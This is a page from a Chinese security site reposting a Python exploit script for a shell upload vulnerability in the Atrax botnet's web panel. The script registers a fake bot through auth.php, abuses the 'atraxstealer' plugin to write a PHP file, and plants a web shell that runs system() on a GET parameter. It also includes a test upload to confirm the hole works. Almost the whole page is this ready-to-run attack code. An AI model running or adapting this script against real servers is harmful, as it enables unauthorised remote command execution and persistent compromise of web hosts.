首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Atrax Botnet Shell Upload Vulnerability
来源:1337day.com 作者:Xylitol 发布时间:2014-11-25  
import random
import string
import base64
import urllib
import urllib2
  
# <CONFIG>
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
url     = 'http://localhost/atrax/'
# </CONFIG>
  
BOT_MODE_INSERT             = 'b' # BOT MODE
BOT_MODE_RUNPLUGIN          = 'e'
GET_PARAM_MODE              = 'a' # GET PARAM
POST_PARAM_GUID             = 'h' # POST PARAM
POST_PARAM_IP               = 'i'
POST_PARAM_BUILDID          = 'j'
POST_PARAM_PC               = 'k'
POST_PARAM_OS               = 'l'
POST_PARAM_ADMIN            = 'm'
POST_PARAM_CPU              = 'n'
POST_PARAM_GPU              = 'o'
POST_PARAM_PLUGINNAME       = 'q'
  
def request(url, get, post):
        if not get == '':
                url += '?' + get
        encoded = {}
        if not post == '':
                for _ in post.split('&'):
                        data             = _.split('=')
                        encoded[data[0]] = data[1]
        encoded  = urllib.urlencode(encoded)
        request  = urllib2.Request(url, encoded)
        response = urllib2.urlopen(request)
        page     = response.read()
        return page
  
def queryValue(key, value, next=True):
        ret = key + '=' + value
        if next:
                ret += '&'
        return ret
  
def randomString(length = 8):
        return ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(length))
  
def createVictim(url, guid, ip):
        get   = queryValue(GET_PARAM_MODE,     BOT_MODE_INSERT, False)
        post  = queryValue(POST_PARAM_GUID,    guid)
        post += queryValue(POST_PARAM_IP,      ip)
        post += queryValue(POST_PARAM_BUILDID, randomString())
        post += queryValue(POST_PARAM_PC,      randomString())
        post += queryValue(POST_PARAM_OS,      randomString())
        post += queryValue(POST_PARAM_ADMIN,   'yes')
        post += queryValue(POST_PARAM_CPU,     randomString())
        post += queryValue(POST_PARAM_GPU,     randomString(), False)
        return request(url + 'auth.php', get, post)
  
def exploit(url, guid, ip, file, payload):
        get   = queryValue(GET_PARAM_MODE,        BOT_MODE_RUNPLUGIN, False)
        post  = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer')
        post += queryValue(POST_PARAM_GUID,       guid)
        post += queryValue(POST_PARAM_IP,         ip)
        post += queryValue('am',                  randomString())
        post += queryValue('ad',                  file)
        post += queryValue('ab',                  base64.b64encode(payload))
        post += queryValue('ai',                  '18', False)
        request(url + 'auth.php', get, post)
  
def testExploit(url, guid, ip):
        file    = randomString() + '.php'
        payload = '<?php echo("1337"); ?>'
        exploit(url, guid, ip, file, payload)
        return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337'
          
guid    = '7461707a7461707a7461707a7461707a'
ip      = '91.224.13.103'
file    = randomString() + '.php'
if createVictim(url, guid, ip).strip() == 'STOP':
        print '[-] Cannot create victim...'
else:
        print '[~] Victim created/updated...'
        if testExploit(url, guid, ip):
                exploit(url, guid, ip, file, payload)
                print '[+] Exploit uploaded!'
                print '=> ' + url + 'plugins/atraxstealer/wallet/' + file
        else:
                print '[-] Cannot upload payload, maybe the plugin is not actived?'
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Wordpress wpDataTables 1.5.3 s
·FluxBB 1.5.6 SQL Injection
·Internet Explorer OLE Pre-IE11
·WordPress WP-DB-Backup 2.2.4 B
·Hikvision DVR RTSP Request Rem
·TRENDnet SecurView Wireless Ne
·tcpdump 4.6.2 AOVD Unreliable
·phpMyRecipes 1.2.2 (dosearch.p
·tcpdump 4.6.2 Geonet Denial Of
·Arris VAP2500 Authentication B
·tcpdump 4.6.2 OSLR Denial Of S
·Linux Kernel libfutex Local Ro
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved